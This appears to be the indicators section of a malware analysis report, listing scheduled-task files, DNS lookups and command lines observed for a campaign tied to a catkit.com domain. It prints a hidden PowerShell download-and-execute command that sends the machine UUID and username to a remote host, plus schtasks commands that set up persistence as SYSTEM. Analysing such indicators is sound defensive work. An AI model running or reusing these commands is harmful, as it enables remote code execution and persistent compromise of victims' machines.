Technical Information
- <SYSTEM32>\tasks\t.netcatkit.com
- <SYSTEM32>\tasks\xr6ziynzn
- http://+t.###+catkit.com/a.jsp?re################################ as %username%
- DNS ASK t.###catkit.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c (New-Object Net.WebClient).DownloadString('http://'+##.##t'+'catkit.com/a.jsp?re############################################################## Win32_ComputerSystemProduct).UUID,(random))-joi...' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.netcatkit.com /F /tr t.netcatkit.com
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \xr6zIYnZN /F /tr "powershell -c PS_CMD"
- '<SYSTEM32>\schtasks.exe' /run /tn \xr6zIYnZN